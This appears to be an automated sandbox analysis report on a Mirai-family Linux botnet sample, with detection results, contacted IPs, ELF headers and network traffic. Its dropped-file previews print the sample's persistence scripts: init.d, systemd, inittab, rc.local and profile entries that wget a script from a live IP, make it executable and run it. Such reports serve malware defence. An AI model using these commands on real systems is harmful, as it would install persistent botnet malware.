          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6335, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6338, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6230, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6245, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6333, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6335, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6338, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Unix Shell Configuration Modification
          1
          Unix Shell Configuration Modification
          1
          Masquerading
          1
          OS Credential Dumping
          1
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          Data Manipulation
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Systemd Service
          1
          Systemd Service
          2
          File and Directory Permissions Modification
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt2
          Scripting
          Logon Script (Windows)11
          File Deletion
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568904 Sample: x86_64.nn.elf Startdate: 05/12/2024 Architecture: LINUX Score: 100 51 63.4.197.151, 23, 55734 UUNETUS United States 2->51 53 154.216.19.139, 199, 38964, 38966 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 2->53 55 18 other IPs or domains 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 3 other signatures 2->63 8 x86_64.nn.elf 2->8         started        12 gnome-session-binary sh gsd-housekeeping 2->12         started        14 udisksd dumpe2fs 2->14         started        16 9 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 65 Sample tries to set files in /etc globally writable 8->65 67 Sample tries to persist itself using /etc/profile 8->67 69 Drops files in suspicious directories 8->69 71 2 other signatures 8->71 18 x86_64.nn.elf sh 8->18         started        20 x86_64.nn.elf sh 8->20         started        22 x86_64.nn.elf sh 8->22         started        24 6 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/sh, POSIX 24->49 dropped 73 Drops files in suspicious directories 24->73 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 3 other processes 24->41 signatures9 process10 signatures11 75 Sample tries to set files in /etc globally writable 28->75 77 Sample tries to persist itself using System V runlevels 31->77
          SourceDetectionScannerLabelLink
          x86_64.nn.elf42%ReversingLabsLinux.Backdoor.Mirai
          x86_64.nn.elf100%AviraEXP/ELF.Mirai.W
          x86_64.nn.elf100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          /etc/init.d/sh3%ReversingLabsText.Browser.Generic
          /etc/init.d/system3%ReversingLabsText.Browser.Generic
          /etc/rc.local0%ReversingLabs
          /etc/rc.local0%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://94.156.227.233/curl.shx86_64.nn.elffalse
            high
            http://94.156.227.233/lol.shx86_64.nn.elffalse
              high
              http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sx86_64.nn.elffalse
                high
                http://94.156.227.233/x86_64.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.38.dr, bootcmd.12.dr, custom.service.12.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  154.216.19.139
                  unknownSeychelles
                  135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                  181.221.140.128
                  unknownBrazil
                  28573CLAROSABRfalse
                  63.4.197.151
                  unknownUnited States
                  701UUNETUSfalse
                  180.138.114.124
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  9.74.43.104
                  unknownUnited States
                  3356LEVEL3USfalse
                  174.59.252.56
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  169.68.103.115
                  unknownUnited States
                  37611AfrihostZAfalse
                  141.55.192.117
                  unknownGermany
                  680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                  54.171.230.55
                  unknownUnited States
                  16509AMAZON-02USfalse
                  84.16.187.43
                  unknownDenmark
                  8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
                  27.159.156.110
                  unknownChina
                  133774CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCNfalse
                  166.173.139.121
                  unknownUnited States
                  20057ATT-MOBILITY-LLC-AS20057USfalse
                  94.156.227.234
                  unknownBulgaria
                  57463NETIXBGfalse
                  186.161.57.239
                  unknownPeru
                  21575ENTELPERUSAPEfalse
                  13.114.223.24
                  unknownUnited States
                  16509AMAZON-02USfalse
                  132.163.61.148
                  unknownUnited States
                  2648NIST-BOULDERUSfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  213.181.192.16
                  unknownHungary
                  62292EZIT-ASHUfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  154.216.19.139m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      54.171.230.55co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        dwhdbg.elfGet hashmaliciousMiraiBrowse
                                          atlas.mips.elfGet hashmaliciousUnknownBrowse
                                            main_x86.elfGet hashmaliciousMiraiBrowse
                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                spc.elfGet hashmaliciousUnknownBrowse
                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                    aarch64.elfGet hashmaliciousUnknownBrowse
                                                      arm.elfGet hashmaliciousUnknownBrowse
                                                        arm7.elfGet hashmaliciousUnknownBrowse
                                                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLAROSABRarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 177.194.36.247
                                                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 177.181.194.146
                                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 187.122.134.252
                                                          x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 201.21.20.22
                                                          sora.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 189.95.170.158
                                                          teste.m68k.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                          • 189.3.202.55
                                                          teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                          • 191.184.194.126
                                                          teste.x86_64.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                          • 189.93.206.230
                                                          teste.mpsl.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                          • 177.65.207.146
                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                          • 191.176.179.103
                                                          SKHT-ASShenzhenKatherineHengTechnologyInformationCom68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 154.216.19.139
                                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 45.207.215.90
                                                          zmap.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 154.216.18.131
                                                          zmap.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 154.216.18.131
                                                          zmap.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 154.216.18.131
                                                          armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 156.241.11.68
                                                          zmap.x86.elfGet hashmaliciousOkiruBrowse
                                                          • 154.216.18.131
                                                          armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 156.230.19.162
                                                          zmap.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 154.216.18.131
                                                          zmap.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 154.216.18.131
                                                          CHINANET-BACKBONENo31Jin-rongStreetCNarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 182.133.16.219
                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 171.80.218.108
                                                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 139.203.232.218
                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 222.187.175.216
                                                          powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 110.180.4.201
                                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 113.77.117.235
                                                          sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 14.119.225.104
                                                          armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 36.61.141.99
                                                          sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 121.57.253.42
                                                          mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 219.139.144.7
                                                          UUNETUSarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 65.208.23.61
                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 66.58.92.15
                                                          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 45.149.241.64
                                                          boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 45.149.241.64
                                                          Patch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                          • 146.190.110.91
                                                          RuntimeBroker.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                          • 146.190.110.91
                                                          boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 45.149.241.64
                                                          boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 45.149.241.64
                                                          powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 71.117.44.123
                                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 213.53.79.44
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          /etc/init.d/systemx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  /etc/init.d/shx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          Process:/tmp/x86_64.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):111
                                                                          Entropy (8bit):4.663595298101345
                                                                          Encrypted:false
                                                                          SSDEEP:3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
                                                                          MD5:3290F4F4E0B77B577C59026DEF246CEE
                                                                          SHA1:C51EAE7170430B5697B881BE716280D1FAAA9147
                                                                          SHA-256:534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
                                                                          SHA-512:DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                          Process:/bin/sh
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):355
                                                                          Entropy (8bit):4.416220583499086
                                                                          Encrypted:false
                                                                          SSDEEP:6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
                                                                          MD5:4C835AF4434E28E5B56D8CDFA8EE753D
                                                                          SHA1:B18DA30B2DF68AE4C788540CED328CA545C02F42
                                                                          SHA-256:CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
                                                                          SHA-512:877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Joe Sandbox View:
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          Reputation:low
                                                                          Preview:#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                          Process:/tmp/x86_64.nn.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):98
                                                                          Entropy (8bit):4.615605979741142
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
                                                                          MD5:FE7F857A52EC42881A76D01D4A4A1C3C
                                                                          SHA1:6391FE715F06AB2D7E58D18A41ED3A358C7E820C
                                                                          SHA-256:20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
                                                                          SHA-512:4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Joe Sandbox View:
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          Reputation:low
                                                                          Preview:#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                          Process:/tmp/x86_64.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):103
                                                                          Entropy (8bit):4.612417623467759
                                                                          Encrypted:false
                                                                          SSDEEP:3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
                                                                          MD5:175C6814BBE06EB5816EFE3FE3934230
                                                                          SHA1:8C1A49BF7CA134E8AD0DDA70872367062BC600C5
                                                                          SHA-256:11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
                                                                          SHA-512:C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                          Process:/tmp/x86_64.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):53
                                                                          Entropy (8bit):3.871459242626451
                                                                          Encrypted:false
                                                                          SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                          MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                          SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                          SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                          SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                          Malicious:false
                                                                          Preview:gorilla botnet is on the device ur not a cat go away.
                                                                          Process:/tmp/x86_64.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):94
                                                                          Entropy (8bit):4.486383977913608
                                                                          Encrypted:false
                                                                          SSDEEP:3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
                                                                          MD5:CEC61C0CDC61AB271C45B85281469388
                                                                          SHA1:E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
                                                                          SHA-256:AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
                                                                          SHA-512:71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
                                                                          Malicious:true
                                                                          Preview:/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                          Process:/tmp/x86_64.nn.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):10
                                                                          Entropy (8bit):3.121928094887362
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH4vn:hv
                                                                          MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                          SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                          SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                          SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                          Preview:#!/bin/sh.
                                                                          Process:/tmp/x86_64.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.064804988275458
                                                                          Encrypted:false
                                                                          SSDEEP:6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
                                                                          MD5:8156A50E9D158639626649BD134E7D5D
                                                                          SHA1:D95D108656621F4B4F82B93CA0694D66F4A2FEF4
                                                                          SHA-256:FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
                                                                          SHA-512:DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
                                                                          Malicious:false
                                                                          Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):76
                                                                          Entropy (8bit):3.7627880354948586
                                                                          Encrypted:false
                                                                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                          Malicious:false
                                                                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                          Entropy (8bit):6.311500521738073
                                                                          TrID:
                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                          File name:x86_64.nn.elf
                                                                          File size:97'856 bytes
                                                                          MD5:e67f9408d19e274031b09ddb0df19889
                                                                          SHA1:9ed2655ddc054b09bfad0887b8a846686fc41222
                                                                          SHA256:d9e0bb9caa406ba0b6355cc9187426989952afe832ca54dc5e735d4abd760bb0
                                                                          SHA512:41b31b8d5a2f5c7dc5ad605ab9bd28b38b824ac71ca9f44a534130dc3894c07c9c72f1a22bf681e03f5fb113a9469c5204350fb839add48d4039752a026fa943
                                                                          SSDEEP:1536:de80+KoiHLq0tUrqRhMD1F2dYyDH4/AbT4Cwhc:w80+KoEG0OqR81F2dYyc/AbT48
                                                                          TLSH:A3A33903B580D4FDC448C2354BAFA13AD572F59D0235B2AB27D8FB262F8DE10672D968
                                                                          File Content Preview:.ELF..............>.......@.....@........{..........@.8...@.......................@.......@.....ps......ps......................xs......xsQ.....xsQ..............1..............Q.td....................................................H...._.....=..H........

                                                                          ELF header

                                                                          Class:ELF64
                                                                          Data:2's complement, little endian
                                                                          Version:1 (current)
                                                                          Machine:Advanced Micro Devices X86-64
                                                                          Version Number:0x1
                                                                          Type:EXEC (Executable file)
                                                                          OS/ABI:UNIX - System V
                                                                          ABI Version:0
                                                                          Entry Point Address:0x400194
                                                                          Flags:0x0
                                                                          ELF Header Size:64
                                                                          Program Header Offset:64
                                                                          Program Header Size:56
                                                                          Number of Program Headers:3
                                                                          Section Header Offset:97216
                                                                          Section Header Size:64
                                                                          Number of Section Headers:10
                                                                          Header String Table Index:9
                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                          NULL0x00x00x00x00x0000
                                                                          .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                                          .textPROGBITS0x4001000x1000x13e160x00x6AX0016
                                                                          .finiPROGBITS0x413f160x13f160xe0x00x6AX001
                                                                          .rodataPROGBITS0x413f400x13f400x34300x00x2A0032
                                                                          .ctorsPROGBITS0x5173780x173780x100x00x3WA008
                                                                          .dtorsPROGBITS0x5173880x173880x100x00x3WA008
                                                                          .dataPROGBITS0x5173a00x173a00x7e00x00x3WA0032
                                                                          .bssNOBITS0x517b800x17b800x29e80x00x3WA0032
                                                                          .shstrtabSTRTAB0x00x17b800x3e0x00x0001
                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                          LOAD0x00x4000000x4000000x173700x173706.36550x5R E0x100000.init .text .fini .rodata
                                                                          LOAD0x173780x5173780x5173780x8080x31f03.72570x6RW 0x100000.ctors .dtors .data .bss
                                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 5, 2024 07:27:45.868150949 CET38964199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:45.988343954 CET19938964154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:45.988394976 CET38964199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:45.990922928 CET38964199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:45.992439032 CET38964199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:45.994937897 CET38966199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.111083984 CET19938964154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.114634991 CET19938966154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.114687920 CET38966199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.116596937 CET38966199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.117793083 CET38966199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.125437975 CET38968199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.155220032 CET19938964154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.237479925 CET19938966154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.245181084 CET19938968154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.247683048 CET38968199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.259835958 CET38968199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.272452116 CET38968199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.279237986 CET19938966154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.298192978 CET38970199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.379785061 CET19938968154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.417954922 CET19938970154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.418030024 CET38970199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.423358917 CET38970199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.425875902 CET38970199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.432991982 CET38972199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.435036898 CET19938968154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.543186903 CET19938970154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.552735090 CET19938972154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.552829981 CET38972199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.556797981 CET38972199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.559376955 CET38972199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.561301947 CET33606443192.168.2.2354.171.230.55
                                                                          Dec 5, 2024 07:27:46.567070961 CET38974199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.587060928 CET19938970154.216.19.139192.168.2.23
